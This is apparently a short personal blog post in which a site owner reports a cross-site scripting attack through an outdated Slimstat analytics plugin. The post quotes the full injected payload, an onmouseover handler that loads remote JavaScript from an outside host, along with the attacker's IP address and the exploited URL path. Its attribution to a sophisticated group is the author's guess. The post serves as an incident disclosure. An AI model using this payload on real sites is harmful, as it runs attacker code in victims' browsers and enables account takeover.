Just last week or so, while going over my real time analytics I noticed an interesting payload tied to 1 particular users web visit.
I was scanning over Slimstat real time analytics. This shows visits (active, and intraday). Slimstat is great for this, and also, I think I was behind by 3 updates on it. Slimstat is built with javascript, btw. Regardless they found a hole. That’s all it takes!
This user (or apt group), found I hadn’t updated my slimstat analytics and then got to work. This obviously isn’t just your run of the mill xss payload! If i could guess this group, at their highly sophisticated level, likely took half a day to craft this together. Their ip originated from Frankfurt, an it has ties to the infamous mirai malware (via virustotal hashes, etc.)
url exploited: /test-user-creator.
The ip: 84.201.4.181 . (With (unknown OS)
And the Xss payload : http://attacker.com/user.js' style='position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;z-index:9999;' onmouseover='var s=document.createElement("script");s.src="https://staticsx.top/x.js";document.body.appendChild(s);' x=' external
Now was it effective? Yes it was. As was viewing my analytics, it actually opened a new browser tab on me in chrome. I was impressed to say the least.
I quickly disabled the plugin, and logged out, logged back in and saved it as a draft for this blog post here.
Leave a Reply